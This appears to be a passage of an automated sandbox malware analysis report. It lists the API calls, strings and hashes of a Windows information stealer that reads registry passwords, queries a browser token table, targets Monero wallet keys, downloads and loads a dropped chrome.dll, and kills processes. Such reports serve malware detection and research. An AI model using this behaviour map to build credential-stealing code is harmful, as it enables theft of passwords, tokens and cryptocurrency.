                                    • Part of subcall function 00BA7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA7411
                                    • Part of subcall function 00BA7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA746D
                                    • Part of subcall function 00BA7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00BA74B2
                                    • Part of subcall function 00BA7330: HeapFree.KERNEL32(00000000), ref: 00BA74B9
                                  • lstrcat.KERNEL32(00000000,00BC192C), ref: 00BA7666
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA76A8
                                  • lstrcat.KERNEL32(00000000, : ), ref: 00BA76BA
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA76EF
                                  • lstrcat.KERNEL32(00000000,00BC1934), ref: 00BA7700
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00BA7733
                                  • lstrcat.KERNEL32(00000000,00BC1938), ref: 00BA774D
                                  • task.LIBCPMTD ref: 00BA775B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: 7c7df4b170306f08dc7a51183d3c80ca9b9cf4bd87b0790edc0050cc2748c55d
                                  • Instruction ID: f807971939b1c8db969e9097ee986f30913ee23c8fb9a0175208510020471aee
                                  • Opcode Fuzzy Hash: 7c7df4b170306f08dc7a51183d3c80ca9b9cf4bd87b0790edc0050cc2748c55d
                                  • Instruction Fuzzy Hash: 243161B1D0C104EFDB04EBA4DC96DFE77B9AB49301B504168F116B32A1DE34A98ACB90
                                  Function 00BB8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0130E468,00000000,?,00BC0E14,00000000,?,00000000), ref: 00BB82C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB82C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BB82E8
                                  • __aulldiv.LIBCMT ref: 00BB8302
                                  • __aulldiv.LIBCMT ref: 00BB8310
                                  • wsprintfA.USER32 ref: 00BB833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 17caed44d843369f8ec1b56477c2164516d396e11118f3f413884ec39d6a8976
                                  • Instruction ID: 90c395e8ec104393e64cfe9ffd0477597ef92af24e8fefe812e3037715421e68
                                  • Opcode Fuzzy Hash: 17caed44d843369f8ec1b56477c2164516d396e11118f3f413884ec39d6a8976
                                  • Instruction Fuzzy Hash: 012108B1E44208ABDB00DFD5CC49FBEB7B8FB44B14F104559F619BB280D7B869048BA5
                                  Function 00BA60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4889
                                    • Part of subcall function 00BA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4899
                                  • InternetOpenA.WININET(00BC0DFB,00000001,00000000,00000000,00000000), ref: 00BA615F
                                  • StrCmpCA.SHLWAPI(?,0130EE58), ref: 00BA6197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BA61DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BA6203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00BA622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BA625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00BA6299
                                  • InternetCloseHandle.WININET(?), ref: 00BA62A3
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA62B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 00b9ecc71b690b4fbb51e6b88c9837432680fa20ba45c27be5a1180a2c917d24
                                  • Instruction ID: 4de67d1130c755481af3319853753771696a45b99f62c831710ebedf3e0c11fe
                                  • Opcode Fuzzy Hash: 00b9ecc71b690b4fbb51e6b88c9837432680fa20ba45c27be5a1180a2c917d24
                                  • Instruction Fuzzy Hash: D5514EB1A04218AFDF20DFA0CC45BEE77B8AB45301F4040D8E609B71C0DBB4AA89CF95
                                  Function 00C2012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 00C2024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 00C2035B
                                  • CatchIt.LIBVCRUNTIME ref: 00C203AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 00C204C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: 230816e2a2c2ea3a6d7eeb0557c29a34d7cc0d6b0eb7adece47379d1cf63103a
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: B6B19F71800229DFCF15EFA4E8819AEBBB5FF14310F24815BE9216BA13D730DA51DB91
                                  Function 00BA7330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BA739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BA7411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BA746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA74B2
                                  • HeapFree.KERNEL32(00000000), ref: 00BA74B9
                                  • task.LIBCPMTD ref: 00BA75B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 0903113ef9a08b78b5529f558be00cda89c3d81d4217f6fa09ea723b33ff3ac1
                                  • Instruction ID: 5f4af7e8799aa47cf84ac217d44d6365b78bc5b7b97acc75183d4e5c9f4406b5
                                  • Opcode Fuzzy Hash: 0903113ef9a08b78b5529f558be00cda89c3d81d4217f6fa09ea723b33ff3ac1
                                  • Instruction Fuzzy Hash: FC61F8B5D482689BDB24DB50CC55BD9B7F8FB59300F0081E9E689A6141EFB06BC9CF90
                                  Function 00BABA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • lstrlen.KERNEL32(00000000), ref: 00BABC6F
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BABC9D
                                  • lstrlen.KERNEL32(00000000), ref: 00BABD75
                                  • lstrlen.KERNEL32(00000000), ref: 00BABD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 4ad8f1275589a1a8e1ed2cc3db54a02ac67dd3c8634d87c62c8d7aa49944d883
                                  • Instruction ID: f47b0aef80231fb6592cd4ef1b77ff0262f0a95c103f8ca60bbf69e0a46d15b8
                                  • Opcode Fuzzy Hash: 4ad8f1275589a1a8e1ed2cc3db54a02ac67dd3c8634d87c62c8d7aa49944d883
                                  • Instruction Fuzzy Hash: 09B1FF71D10108ABCF14EBA0DDA6EFE77B9AF54300F4045E8F51676192EFB46A48CB62
                                  Function 00BB6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: c276a3a63de13fffb9ca216336902a2669b4ef9d4878b258489af8b7921406c4
                                  • Instruction ID: 7278611f4f0b15dd07090615a01a2d0836eb639f6d57bd798125ff6a52fe40ef
                                  • Opcode Fuzzy Hash: c276a3a63de13fffb9ca216336902a2669b4ef9d4878b258489af8b7921406c4
                                  • Instruction Fuzzy Hash: EBF03A3090A209EFD744EFE2A8097ACBB70EB04706F5141A5E65DB65A0CBB44A80DB51
                                  Function 00BB08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BB9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00BB08DC,C:\ProgramData\chrome.dll), ref: 00BB9871
                                    • Part of subcall function 00BAA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BAA098
                                  • StrCmpCA.SHLWAPI(00000000,013096D8), ref: 00BB0922
                                  • StrCmpCA.SHLWAPI(00000000,01309658), ref: 00BB0B79
                                  • StrCmpCA.SHLWAPI(00000000,01309638), ref: 00BB0A0C
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00BB0C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 00BB08CD
                                  • C:\ProgramData\chrome.dll, xrefs: 00BB0C30
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: 808df9fb12b437995d4980124a41ba54c3b73c5d5d33bc706aee480f62dbc610
                                  • Instruction ID: 4f29952ce1498d42dcf31835ca110031e8f75c0163db123860ad5ed7f603b8c4
                                  • Opcode Fuzzy Hash: 808df9fb12b437995d4980124a41ba54c3b73c5d5d33bc706aee480f62dbc610
                                  • Instruction Fuzzy Hash: 31A11571B001089FCB28EF64D996EFD77F6EF95300F5085ADE40A5F291DA709A09CB92
                                  Function 00BA9E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                  • wsprintfA.USER32 ref: 00BA9E7F
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BA9F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 00BA9F17
                                  • lstrcat.KERNEL32(00000000,00BC12D8), ref: 00BA9F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00BA9F7C
                                  • Sleep.KERNEL32(00001388), ref: 00BAA013
                                    • Part of subcall function 00BB99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB99C5
                                    • Part of subcall function 00BB99A0: Process32First.KERNEL32(00BAA056,00000128), ref: 00BB99D9
                                    • Part of subcall function 00BB99A0: Process32Next.KERNEL32(00BAA056,00000128), ref: 00BB99F2
                                    • Part of subcall function 00BB99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BB9A4E
                                    • Part of subcall function 00BB99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00BB9A6C
                                    • Part of subcall function 00BB99A0: CloseHandle.KERNEL32(00000000), ref: 00BB9A79
                                    • Part of subcall function 00BB99A0: CloseHandle.KERNEL32(00BAA056), ref: 00BB9A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
